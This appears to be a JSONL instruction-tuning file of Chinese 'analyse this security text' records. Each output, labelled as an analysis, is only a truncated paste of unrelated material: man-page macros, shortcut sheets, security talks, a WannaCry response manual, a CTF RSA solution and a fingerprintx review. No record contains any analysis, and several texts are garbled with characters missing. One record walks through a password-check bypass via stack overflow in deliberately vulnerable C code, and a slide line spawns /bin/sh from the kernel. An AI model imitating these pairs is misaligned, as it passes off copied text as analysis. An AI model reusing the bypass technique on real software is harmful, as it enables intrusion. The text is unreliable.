中service 此命令位于 `/sbin/service`用 file 命令查看此命令会发现它是一个脚本命令分析脚本可知此命令的作用是去 `/etc/init.d` 目录下寻找相应的服务进行开启和关闭等操作例如 `service mysqld stop` 等价于 `/etc/init.d/mysqld stop` --- ## xinetd 程序 xinetd 即 extended internet daemonxinetd 是新一代的网络守护进程服务程序又叫超级 Internet 服务器经常用来管理多种轻量级 Internet 服务xinetd 提供类似于 inetd+tcp_wrapper 的功能但是更加强大和安全 **安装及启停** ```bash rpm -ivh xinetd* yum -y install xinetd ``` ```bash # 启动 service xinetd start # 停止 service xinetd stop # 重启 service xinetd restart ``` **配置** xinetd 的配置文件是 `/etc/xinetd.conf`但是它只包括几个默认值及 `/etc/xinetd.d` 目录中的配置文件 如果要启用或禁用某项 xinetd 服务编辑位于 `/etc/xinetd.d` 目录中的配置文件例如disable 属性被设为 yes表示该项服务已禁用disable 属性被设为 no表示该项服务已启用 参数和值之间", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1996-1997 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass '\\\" Start of description of a specific option. cmdName gives the '\\\" option's name as specified in the class command, dbName gives '\\\" th", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Missive date: 2022-11-23 16:23:31.695283 background: bg-[#3665e5] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 83 keyboard shortcuts found in Missive --- Keyboard Shortcuts ------------------ ### Navigation Shortcut | Action ---|--- `Down` | Next item `Up` | Previous item `Alt` `Up` | First item `Alt` `Down` | Last item `Right` | Open item `Left` | Collapse item `Tab` | Next scope `Shift` `Tab` | Previous scope `PgUp` | Scroll up `PgDn` | Scroll down {.shortcuts} ### Selection Shortcut | Action ---|--- `Shift` `Up` | Select next conversation `Shift` `Down` | Select previous conversation `Alt` `Shift` `Up` | Select until first conversation `Alt` `Shift` `Down` | Select until last conversation `Ctrl` `A` | Select all conversations {.shortcuts} ### Application Shortcut | Action ---|--- `Ctrl` `N` | Compose new email `Ctrl` `Shift` `N` | Create new conversation `Ctrl` `F` | Search `Ctrl` `Shift` `C` | Focus comment box `Ctrl` `Shift` `X` | Focus task box `Space` | Preview item `Ctrl` `Up` | Edit previous comment `Ctrl` `Shift` `Y` | Set a status `Ctrl` `.` | Open conversation contextual menu `Ctrl` `G` | Open more menu `Ctrl` `L` | Open location `Ctrl` `,` | Open preferences `Ctrl` `Shift` `,` | Open contacts `Ctrl` `Alt` `S` | Toggle right sidebar `Ctrl` `Alt` `N` | Main right sidebar action `Ctrl` `Alt` `R` | Reload {.shortcuts} ### Actions {.row-span-2} Shortcut | Action ---|--- `Back` | Archive or remove label `Alt` `Back` | Close `Cmd` `Back` | Trash `Ctrl` `Shift` `L` | Label as... `Ctrl` `Alt` `L` | Move to... `Ctrl` `Shift` `K` | Assign `Ctrl` `Shift` `J` | Snooze `Ctrl` `Shift` `S` | Toggle star `Ctrl` `Shift` `M` | Toggle watch `Ctrl` `R` | Reply all `Ctrl` `Shift` `R` | Reply `Ctrl` `Shift` `F` | Forward `Ctrl` `Shift` `D` | Open or focus draft `Ctrl` `P` | Print `Ctrl` `O` | Open in new window `Ctrl` `Z` | Undo last action `Ctrl` `Shift` `Z` | Redo last action `Ctrl` `Shift` `I` | Mark as read `Ctrl` `Shi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nQuantum Classification of Malware John Seymour seymour1@umbc.edu Charles Nicholas nicholas@umbc.edu August 24, 2015 Abstract Quantum computation has recently become an important area for security research, with its applications to factoring large numbers and secure communication. In practice, only one company (D-Wave) has claimed to create a quantum computer that can solve relatively hard problems, and that claim has been met with much skepticism. Regardless of whether it is using quantum effects for computation or not, the D-Wave architecture cannot run the standard quantum algorithms, such as Grovers and Shors. The D-Wave architec- ture is instead purported to be useful for ma- chine learning and for heuristically solving NP-Complete problems. Well show why the D-Wave and the ma- chine learning problem for malware classifi- cation seem especially suited for each other. We also explain how to translate the clas- sification problem for malicious executables into an optimization problem that a D-Wave machine can solve. Specifically, using a 512- qubit D-Wave Two processor, we show that a minimalist malware classifier, with cross- validation accuracy comparable to standard machine learning algorithms, can be created. However, even such a minimalist classifier in- curs a surprising level of overhead. 1 Introduction The D-Wave architecture is a unique ap- proach to computing that utilizes quantum annealing to solve discrete optimization prob- lems. At the time of this writing, the ex- tent to which the D-Wave machines utilize quantum effects for computational purposes is a hotly debated topic. Regardless, the D-Wave machine is not a general purpose quantum computer; it cannot run well-known quantum algorithms such as Shors or Grovers algorithms. Applications for D-Wave ma- chines instead include binary classification, complex protein-folding models, and heuris- tics for solving intractable problems such as the Traveling Salesman Problem. We fo- cus on one method for binary class", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNCC Group 2021. All rights reserved Instrument and Find Out Writing Parasitic Tracers for High(-Level) Languages Jeff Dileo @chaosdatumz DEF CON 29 call_usermodehelper(\"/bin/sh\",(char*[]){\"/bin/sh\",\"-c\",\"whoami\",NULL},NULL,5)  NCC Group 2021. All rights reserved  @chaosdatumz  Agent of chaos  Unix aficionado  Technical Director / Research Director @ NCC Group  I like to do terrible things to/with/in:  programs  languages  runtimes  memory  kernels  packets  bytes  ... NOTICE By viewing this presentation you agree to indemnify and hold harmless the presenter in the event that you decide to take any of his advice and find yourself unable to sleep at 4am in the morning due to language demons. Outline  NCC Group 2021. All rights reserved  Background  Parasitic Tracers  Designing Parasitic Tracers (for high-level languages)  Case Study: Ruby  Conclusion Background  Tracing and Me  NCC Group 2021. All rights reserved  Ive done a lot of work with dynamic instrumentation and tracing  Java Bytecode  Android (Frida, Xposed)  Linux (eBPF, Frida)  Generally, to aid in reversing (e.g. dump process state) or to util-ize existing things Background  Tracing and Me  NCC Group 2021. All rights reserved  Ive done a lot of work with dynamic instrumentation and tracing  Java Bytecode  Android (Frida, Xposed)  Linux (eBPF, Frida)  Generally, to aid in reversing (e.g. dump process state) or to util-ize existing things  Dynamic Instrumentation  Function hooking  Instruction instrumentation (assembly, bytecode, etc.)  Dynamic Tracing  Dynamically enabling/disabling existing logging functionality  Dynamically adding enhanced logging functionality that wasnt there before Background  Tracing and Me  NCC Group 2021. All rights reserved  Ive done a lot of work with dynamic instrumentation and tracing  Java Bytecode  Android (Frida, Xposed)  Linux (eBPF, Frida)  Ruby (Frida)  Generally, to aid in reversing (e.g. dump process state) or to util-ize existing things  Dynamic Instrumentation  Function", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nReal-time Bluetooth Device Detection with Blue Hydra Granolocks Zero_Chaos  Pwnie Express  Focused on device detection  Enjoys long walks in the woods  Travel to exotic locations  Draws pretty weird pictures  Existential AF  Hacking the planet  Gives great back rubs Granolocks Narcissus Zero_Chaos Narcissus  Eagle Scout  Open{Zaurus,Embedded,wrt} Maintainer  Aircrack-ng Developer  Injection/Drivers, airmon-zc  Pentoo Linux Developer  Gentoo Linux Developer  Random Hacker of ARMs  Husband & Father  Random Association of Wireless Researchers (RAWR)  Defcon/Shmoocon/etc Wireless CTF  Far too easily entertained  Not a lawyer What is Bluetooth  Cheap  Cable replacement  Frequency Hopping Spread Spectrum  No monitor mode :-(  Class  Class 1 100mW (high power devices, Sena dongle)  Class 2 10mW (phone / most laptops)  Class 3 1mW Bluetooth Waterfall Bluetooth Classic  Discoverable  Non-discoverable  Pairing Bluetooth Low Energy  General Discoverability  Limited Discoverability  Non-discoverable  Yet somehow still advertises? Bluetooth Proliferation  Random IoT  Wearables (sales in 2015)  Fitbit 21 million  Xiaomi 12 million  Apple 11.6 million  Garmin 3.3 million  Samsung 3.1 million  Others 27 million  Total 78.1 million  *Source: IDC Worldwide Quarterly Wearable Device Tracker, February 23, 2016 Prior Art - Cracking  Redfang  Btcrack  Crackle  Le pin cracker  Bluesnarfer  Phonebook dumping from old phones Prior Art - Discovery  Bluelog  Discoverable classic mode only  No le support  Mostly a logger  Btscanner  Discoverable classic mode only  No le support  Unmaintained  Neat gui Useful Tools  Bluez - Useful documentation and examples  hciconfig  hcitool  Only discoverable classic devices  Lescan works but hard to parse  outdated  Test-scripts bluez-test discovery  Easy to modify  Shows classic and le  Hides some le devices  Teaches us how to talk to the bluetooth card  Only sees discoverable devices Ubertooth  Ubertooth-scan  Ubertooth-rx  Ubertooth-rx -z Blue Hydra - Go", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n关于系统化应对 NSA 网络军火装备的操作手册 安天版权所有欢迎无损转载 第 1 页 关于系统化应对 NSA 网络军火装备的操作手册 安天安全研究与应急处理中心安天 CERT 报告初稿完成时间2017 年 05 月 22 日 06 时 00 分 首次发布时间2017 年 05 月 22 日 08 时 00 分 本版本更新时间2017 年 05 月 22 日 19 时 00 分 关于系统化应对 NSA 网络军火装备的操作手册 安天版权所有欢迎无损转载 第 2 页 1 概述 北京时间 2017 年 5 月 12 日 20 时左右全球爆发大规模的 WannaCry中文名称魔窟勒索软件感 染事件我国各地的计算机网络特别是一些内网也受到不同程度的影响该勒索软件迅速传播的原因 是利用了基于 445 端口传播扩散的 SMB 漏洞MS17-010该漏洞利用工具原本是美国 NSA 下属的 Equation Group方程式组织使用的网络军火在 2017 年 4 月 14 日的被黑客组织 Shadow Brokers影 子经纪人曝光而该勒索软件的攻击者或攻击组织在借鉴了该网络军火后进行了此次全球性的大规 模攻击事件 关于本次事件需要注意的是WannaCry中文名称魔窟勒索者蠕虫仅利用了被曝光网络军火 中的永恒之蓝Eternal Blue漏洞Shadow Brokers影子经纪人曝光的网络军火中还有系列的 漏洞及其利用工具需要关注和防范同时Shadow Brokers影子经纪人在 2017 年 5 月 16 日再次发布声 明称其会在 6 月公布更多漏洞鉴于以上原因需要对当前已知的和未来将出现的威胁做好相应的防护 和准备工作 在面对各种严峻的安全风险时除了通过有效的安全设计和使用安全产品形成防御能力之外我们必 须要做好合理的补丁策略端口和应用的管理策略边界的安全条件等基础安全工作针对部分网络节点 规模及数量较大的内网用户或部分对业务系统的稳定性及安全性要求较高的用户有可能不能实施全面的 系统的补丁策略同时实时获取补丁的方法一定程度上受到网络隔离的相应影响或限制因此可能需要 采用对严重漏洞进行单点补丁的策略但是因为整个补丁系统的庞大和复杂性补丁和业务系统的相关性 仅靠打补丁和关闭端口并不能系统应对各种复杂情况比如以下几种场景 第一种情况由于相应系统停止更新服务的原因部分安全漏洞被发现时原厂可能已经不再发布补 丁必须要使用升级相关的系统或应用的方式来解决如本次受影响的 Windows XP 及 Windows Server 2003 系统微软已经在多年前停止对这两个系统进行补丁更新及相关的升级对于使用这两种系统的用户来说 无法获得官方的补丁进行修复漏洞此时我们就需要采用有效的安全设计和安全产品等策略进行防护 第二种情况实际上来看每一个应用和它开放的端口都有其特定场景的业务价值因此在采用相 应端口屏蔽策略之前需要判断是不是系统中需要正常使用的应用或端口以及这种应用或端口是否有其 他的方式来替换比如在用户的业务场景下如果 80 端口是为了保证业务系统的正常运行时不能够进行 对其进行端口关闭端口修改或停止相应的服务时就需要采用有效的系统安全设计和使用安全产品形成 对系统的整体性的综合防御来抵御其攻击 关于系统化应对 NSA 网络军火装备的操作手册 安天版权所有欢迎无损转载 第 3 页 第三种情况如果补丁和业务系统的稳定性发生冲突的情况对于多数情况下可能需要保证业务系 统的正常运行这种不能更新补丁的情况可能需要外部的安全检测方法或者替换现有操作系统版本等方 式来解决此时就需要引入特定的安全产品进行防护 合理的补丁策略绝不只是针对重大事件的应急反应而是要在日常的安全应用和维护中需要达成的一 个规范工作及流程仅靠打补丁和关闭端口是无法完整应对网络攻击的必须借助安全设计被动防御 积极防御和威胁情报的结合依托具有有效防护能力的安全产品来形成防御的纵深能力 微软补丁包机制是不安装基础补丁包则无法安装后续的部分补丁因此安天建议普通的桌面系统和不 重要的服务系统在内部无法安装在线补丁的情况下先安装基础补丁包然后再安装无法安装的补丁包 因为基础补丁包体积较大一旦出现大型的安全事故由于大量用户进行下载可能造成下载不成功的情 况因此希望网络管理员提前储备基础补丁包及重要补丁包 核心的安全风险在纵深地带在内网纵深地带整个的安全防御要做纵深展开安天由几个安全产品 所组成的安全防护体系在安天态势感知和监控预警平台的统一协调下能够形成真正有效具备全天候 全方位能力的态势感知能够形成对信息资产的有效防护 图 1 近期泄露的 NSA 网络军火装备与相关漏洞系统版本关系图详图 关于系统化应对 NSA 网络军火装备的操作手册 安天版权所有欢迎无损转载 第 4 页 图 2 近期泄露的 NSA 网络军", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSCADA & PLCs in Correctional Facilities: The Nightmare Before Christmas John Strauchs Tiffany Rad Teague Newman Defcon 19  Analyze SCADA systems and PLC vulnerabilities in correctional and government secured facilities  Discuss modern prison design  Theorize possible attack vectors and routes of malicious code introduction  Explain ladder logic & demo a vulnerability on a Siemens PLC  Recommend solutions  BS, MA, MBA, JD,  President of ELCnetworks, LLC., in Washington, D.C. & Portland, ME  Consulting projects have included law, business and technology development for start-ups and security consulting for U.S. government.  A part-time Adjunct Professor in the computer science department at the University of Southern Maine teaching computer law, ethics and information security.  Academic background includes studies at Carnegie Mellon University, Oxford University, and Tsinghua University (Beijing, China).  Presented at Black Hat USA, Black Hat Abu Dhabi, Defcon 17 & 18, SecTor, HOPE in 2008 & 2010, 27C3 and regional information security conferences.  M.A., C.P.P.  Senior Principal of Strauchs LLC  Conducted the security engineering or consulting for more than 114 justice design (police, courts, and corrections) projects including 14 federal prisons, 23 state prisons, and 27 city or county jails  Owned and operated a professional engineering firm, Systech Group, Inc., for 23 years. Prior to that he was an equity principal in charge of security engineering for Gage-Babcock & Associates  Consultant to  Presenter at Hackers On Planet Earth (HOPE) in 2008 and DojoCon in 2010  Tag-along at Hacking at Random, The Netherlands, 2009  Independent information security consultant based in the Washington, D.C. and Reno, Nevada areas  In 2009, competed in the Netwars segment of the US Cyber Challenge and ranked within the Top 10 in the US in all rounds in which he participated.  Instructor and penetration tester for Core Security Technologies  Instructed professionals on the topics", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 栈溢出基本示例 下面给出一个典型例子在这个例子中由于变量声明的顺序和 buffer 声明的大小导致存在最后一字节的溢出 ```c #include <stdio.h> #include <string.h> #define PASSWORD \"666666\" int verify_password(char *password) { int authenticated; char buffer[8]; authenticated = strcmp(password,PASSWORD); strcpy(buffer,password); return authenticated; } void main() { int valid_flag =0; char password[128]; while(1) { printf(\"please input password: \"); scanf(\"%s\",password); valid_flag = verify_password(password); if (valid_flag !=0) { printf(\"incorrect password!\\n\"); } else { printf(\"Congratulation! You have passed the verification!\\n\"); break; } } } ``` 这是一个简单的密码校验程序会判断输入的字符串是否和666666相等使用 vc6.0 来编译这个程序成功后使用 winchecksec 查看所开的防护可以看到 GS 是开启的但这并不妨碍我们的溢出 ``` C:\\Users\\CarlStar\\Desktop>winchecksec.exe demo1.exe Dynamic Base : false ASLR : true High Entropy VA : false Force Integrity : false Isolation : true NX : true SEH : true CFG : false RFG : false SafeSEH : true GS : true Authenticode : false .NET : true ``` 使用 OllyDbg 动态调试这个程序输入 aaaaaa 看一下程序正常的执行流程为了方便理解整个过程在 **strcmp** 函数和 **strcpy** 执行完后下一个断点 现在可以让程序运行输入 aaaaaa 后程序会执行到我们下的第一个断点进入 **strcmp** 这个函数观察它的返回值因为 a 的 ascii 码值大于 6 的 ascii 码值不出意外函数会返回 **1** x86 下返回值保存在 EAX 寄存器中函数正常返回后由于程序完成它的其余功能还会使用这些寄存器所以这个返回值会保存在栈上也就是 **ss:[0012FEA0]** 这个地方 当执行到第二个断点时看一下栈结构其中 61 是我们输入 a 的 ascii 码形式**00** 是字符串结束符那么 **buffer** 的大小是 8 字节如果我们输入 8 个 a 的话最后的字符串结束符会溢出到 **0012FEA0** 这个位置把原来的值覆盖为 0这样我们就可以改变程序的执行流程输出 Congratulation! You have passed the verification! ``` 0012FE90 CCCCCCCC 0012FE94 CCCCCCCC 0012FE98 61616161 0012FE9C CC006161 0012FEA0 00000001 ``` 好我们先让程序正常运行下去 这次我们输入 8 个 a 验证一下是否如我们想的一样**字符串的结束符会溢出到 strcmp 的返回值**可以看到 strcmp 的返回值还是 1 继续运行到第二个断点处查看一下当前栈的值**strcmp的返回值已经成功由 1 溢出为 0 ** ``` 0012FE90 CCCCCCCC 0012FE94 CCCCCCCC 0012FE98 61616161 0012FE9C 61616161 0012FEA0 00000000 ``` 这时候让程序继续运行成功的输出了预想的字符串", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUsing a Malicious Proxy to Pilfer Data & Wreak Havoc Edward J. Zaborowski ed@thezees.net Abstract .................................................................................................................3 Malicious Web Proxy ...........................................................................................3 Becoming the Proxy ...........................................................................................3 ARP Spoofing.................................................................................................3 Static Configuration........................................................................................3 Web Proxy Auto Detection.............................................................................4 Other Components..............................................................................................4 HTTP Server...................................................................................................4 Proxy Server ...................................................................................................5 What about SSL?..................................................................................................5 About the Doppelganger Tool .............................................................................5 Web Distortion Scenarios ....................................................................................6 Scenario 1: Password Grabbing..........................................................................6 Scenario 2: Root kit Installation .........................................................................6 Conclusion.............................................................................................................6 Abstract People surfing the web assuming that for the most part, what they are looking at is what the website served to their browser. However, that may not necessarily be the case and someone may be sitting in between you and your ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Law of Reversing Fred von Lohmann EFF Senior Staff Attorney Jennifer Stisa Granick EFF Civil Liberties Director DEFCON 17 July 31, 2009 Topics: 1. Legal Traps for Reverse Engineers 2. Jailbreaking the iPhone 3. Online Gaming 4. Lessons and Strategies www.eff.org Work We Do Coders Rights DRM Free Speech Fair Use Privacy The Law of Reverse Engineering The Law of Reverse Engineering install & use software (license agreements) make copies of code created by others (copyright bypass avoid access controls (DMCA) access networked computers (CFAA) The Law of Reverse Engineering [things were not talking about today] patents trade secrets Example of Jailbreaking app developers jailbreak developers (iPhone Dev Team) end users Jailbreaking and Licenses SDK License EULA Jailbreaking and Licenses What does it say about RE? Are these enforceable contracts? Did you click I agree? Is a ban on reversing enforceable? Whats your exposure for breach? Jailbreaking and Licenses Reverse engineering terms upheld: Bowers v. Bay State Davidson & Associates v. Jung (BNETD) But then theres Europe Jailbreaking and  Why  is scarier than contract: Statutory damages Injunctions Criminal penalties Jailbreaking and  Exclusive rights of  owner: Reproduction Distribution Derivative Works Public Performance Public Display Jailbreaking and  Defenses for reverse engineers: Section 107: Fair use Section 117 Jailbreaking and  Fair Use f reverse engineering is required to gain access to unction and ideas, any intermediate copies made a art of reverse engineering are fair use. e sure that you are legitimately in possession of th oftware, and do not copy code in your final produc nless necessary. Jailbreaking and  Section 117 he owner of a copy of a computer program may opy or adapt that program as an essential step in he utilization of the computer program with a machine. Jailbreaking and  Section 117 Are you the owner of the software? s this an adaptation created as an essential step f using the software?", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecurity Research over Windows [ kernel ] Draft v.1.1 $whoami  @zer0mem ~ Peter Hlavaty  Senior Security Researcher at KeenLab, Tencent  MSRC100, pwn2own  Focus : kernel / hyperv / mitigations  sometimes talk somewhere ..  wushu player +-  Sandbox  Restrict resources of target ( process )  #syscalls  file system  registry  inter-process interaction  Different integrity levels  Untrusted  App Container  Low  Medium, .. sandbox attack surface +- IPC ~ Broker vs worker Windows ~ kernel syscalls RPC ~ inter process communication 3rd elements ~ Windows Defender ( AV in general ) Windows kernel ~ attack surface w32k ntoskrnl tm, afd, .. w32k attack surface hardening 4 years ago  Fonts  TTF emulation in kernel  Loading custom fonts  GDI  6+ different kernel objects  *huge* source of UAF, overflows,   EMF  *remote*  User  User mode callbacks machinery now  Fonts  TTF emulation in kernel user mode  Sandboxes low priv proc for custom  GDI -> restricted/no mode  6+ different kernel objects  *huge* source of UAF, overflows,   EMF  *remote* -> disabled by def  User -> restricted/no mode  User mode callbacks machinery w32k exploitation hardening  Restricted resources for exploitation  No resources if DisableW32kSystemCalls flag on   Type isolation  Tactical mitigations, f.e. tagWnd  bugs--  Refactored w32k ( win32k -> win32kfull + win32kbase )  this also left/brings lot of bugs, but showing importance of cleaning up mess  Security researchers community support ( msrc100, insider bounties, .. )  Internal fuzzing++ ? w32k still alive  DirectX  w32k  user callbacks  Small parts of GDI + DComposition  New syscalls keep added in new builds  ~ no w32k in your target ?  w32k is somehow essential of GUI app  Bridge from your target to part of app which have access  Perhaps you can attack another part of app with w32k on ? ntos attack surface  TM + CLFS  hidden syscalls  CLFS : Lockdown for sandboxed processes!  Well finally, heavy parsing in kernel mode..  Without CLFS backup it is very ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# small Crypto, Easy ## Description > When things are small you have to be carefull! ``` message = int('REDACTED', base=35) N = 31882864753733457706900355195561745936205728163688545344755624355885302677527509480805991969514641856022311950710014654686332759895303124949904557581766107448945073828773339824936328117599459705430379854436444155104737774883908742430619368768337640156577480749932446289330171110268995901030116001751822218657 c = message3 % N # c = 272712645051843502864020676686837219546440933810920336253597504130258033336636323130656292878088405243095416128 The message is the flag. No flag format. ``` ## Solution This looks like RSA with a small exponent. This is similar to the picoCTF [miniRSA](/2019_picoCTF/miniRSA.md) challenge. We find the cube root of `c` and decode it as base35 (since the message itself was encoded in base35). ```python import gmpy2 n = 31882864753733457706900355195561745936205728163688545344755624355885302677527509480805991969514641856022311950710014654686332759895303124949904557581766107448945073828773339824936328117599459705430379854436444155104737774883908742430619368768337640156577480749932446289330171110268995901030116001751822218657 e = 3 cipher_str = 272712645051843502864020676686837219546440933810920336253597504130258033336636323130656292878088405243095416128 gs = gmpy2.mpz(cipher_str) gm = gmpy2.mpz(n) ge = gmpy2.mpz(e) root, exact = gmpy2.iroot(gs, ge) print root def base35encode(integer): \"\"\" Convert from Base10 to Base35. Based on https://en.wikipedia.org/wiki/Base36 \"\"\" chars = '0123456789abcdefghijklmnopqrstuvwxy' sign = '-' if integer < 0 else '' integer = abs(integer) result = '' while integer > 0: integer, remainder = divmod(integer, 35) result = chars[remainder] + result return sign + result print base35encode(root) ``` Output: ```console root@kali:/media/sf_CTFs/36c3/small# python 1.py 6484877229948717415163579969767084212 juniorissmallkuchenblech ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNext Generation Collaborative Reversing with Ida Pro and CollabREate Christopher Eagle and Timothy Vidas Department of Computer Science, Naval Postgraduate School, Monterey, CA {cseagle,tmvidas}@nps.edu Abstract A major drawback with the use of most reverse engineering tools is that they were not designed with collaboration in mind. Numerous kludgy solutions exist from asynchronous use of the same data files to working on multiple copies of data files all of which quickly diverge, leaving the differences to somehow be reconciled. These methods and existing tools[1] provided a first step towards automated collaboration amongst IDA Pro[2] users, however they suffer from several shortcomings including the fact that tools have failed to keep pace with the evolution of IDA's internal architecture. In this paper the authors present a new collaborative tool, titled collabREate[3], designed to bring nearly effortless collaboration to IDA users. 1 Introduction Reverse engineering of binary programs is a very time consuming task, often performed in a very serialized manner. Analysts are forced to operate in this serial fashion in large part because of the nature of the tools they choose to use. When several analysts do attempt to coordinate their efforts, it is usually accomplished by sharing copies of files or through strict turn taking access to a single shared work file. In some cases (predominantly with text files), work files may lend themselves to storage within a versioning system such as CVS [4] or subversion [5]. Due to the binary nature of most reverse engineering situations, it is no easy task to provide any automated merging of changes to such files. 1.1 IDA Pro One of the premier analysis tools for analyzing binary executable files is the Interactive Disassembler Pro (IDA Pro, or simply IDA) from Hex-Rays [2]. IDA Pro facilitates disassembly of program binaries by a single user and stores its work in data files which utilize a proprietary, binary format that does", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEXPLOITING URL PARSERS: THE GOOD, BAD, AND INCONSISTENT By Noam Moshe and Sharon Brizinov of Claroty Team82, and Raul Onitza-Klugman and Kirill Efimov of Snyk claroty.com 2 Copyright  2021 Claroty Ltd. All rights reserved 03 Introduction 03 Recent Example: Log4j allowedLdapHost bypass 03 Findings 06 URLs and RFCs 06 What is a URL 07 URL Components 07 Scheme 07 Authority/Netloc 08 Path 09 Query 09 Fragment 10 Relative References 10 WHATWG URL Specifications 12 URL Parsing Inconsistencies 12 Scheme Confusion 14 Slashes Confusion 17 Backslashes Confusion 20 URL Encoded Data Confusion 22 Scheme Mixup 23 Summary 25 Exploiting URL Confusion Vulnerabilities 25 Clearance (Ruby) 25 CVE-2021-23435: Open Redirect Vulnerability 27 But isnt the Browser the Real Culprit? 28 Belledonnes Linphone SIP Stack 28 CVE-2021-33056: Denial of Service 31 Conclusion 31 Vulnerabilities 31 Our Recommendations 32 How to Validate a URL for Redirection 32 Try to use as few different parsers as possible 32 Transfer a Parsed URL Across Microservice Environment 32 Understand Differences in Parsers Involved with Application Business Logic 33 Always Canonicalize the URL Before Parsing TABLE OF CONTENTS claroty.com 3 Copyright  2021 Claroty Ltd. All rights reserved INTRODUCTION The Uniform Resource Locator (URL) is integral to our lives online because we use it for surfing the web, accessing files, and joining video chats. If you click on a URL or type it into a browser, youre requesting a resource hosted somewhere online. As a result, some devices such as our browsers, applications, and servers must receive our URL, parse it into its uniform resource identifier (URI) components (e.g. hostname, path, etc.) and fetch the requested resource. The syntax of URLs is complex, and although different libraries can parse them accurately, it is plausible for the same URL to be parsed differently by different libraries. The confusion in URL parsing can cause unexpected behavior in the software (e.g. web applicati", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n读读 fingerprintx 个端指纹识别具 GitHubhttps://github.com/praetorian-inc/fingerprintx fingerprintx是个类似于httpx的实程序它还持 RDPSSHMySQLPostgreSQLKafka 等指纹识 别服务fingerprintx可以与Naabu等端扫描仪起使对端扫描期间识别的组端进指纹识别 例如程师可能希望扫描 IP 范围然后快速识别在所有发现的端上运的服务 输ip+端就能输出端服务指纹相关的信息 持的协议 SERVICE TRANSPORT SERVICE TRANSPORT HTTP TCP REDIS TCP SSH TCP MQTT3 TCP MODBUS TCP VNC TCP TELNET TCP MQTT5 TCP FTP TCP RSYNC TCP SMB TCP RPC TCP DNS TCP OracleDB TCP SMTP TCP RTSP TCP PostgreSQL TCP MQTT5 TCP (TLS) RDP TCP HTTPS TCP (TLS) POP3 TCP SMTPS TCP (TLS) KAFKA TCP MQTT3 TCP (TLS) MySQL TCP RDP TCP (TLS) MSSQL TCP POP3S TCP (TLS) LDAP TCP LDAPS TCP (TLS) IMAP TCP IMAPS TCP (TLS) SNMP UDP Kafka TCP (TLS) OPENVPN UDP NETBIOS-NS UDP IPSEC UDP DHCP UDP STUN UDP NTP UDP DNS UDP 想看看源码这些协议是怎么做识别以及怎么组织的 看官描述使 fingerprintx 有个快速模式 fast 该fast模式将仅尝试为每个标识别与该端关联的默认服务例如如果praetorian.com:8443是输则 只会https运插件如果https未在 上运praetorian.com:8443则不会有输出为什么要这样做这是 在量主机列表中识别多数服务的快速法想想2/8原则  和nmap的区别 个在 8080 端打开的服务器上运的插件是 http 插件默认服务法在最好的情况下减少了扫描时间 多数情况下在端 8044322 上运的服务是 httphttps 和 ssh所以这是fingerprintx先检 查的内容 插件组织结构 这个项提供了很好的个插件架构fingerprintx的指纹识别是以插件的形式进的如ftp识别是个插件 mysql识别也是个插件 插件录位于 pkg/plugins/services 虽然不是动态插件加载作为go的也值得学习 插件的接是 所有的插件都要实现这些法 看个简单的插件源码例如ftp type Plugin interface { Run(net.Conn, PluginConfig) 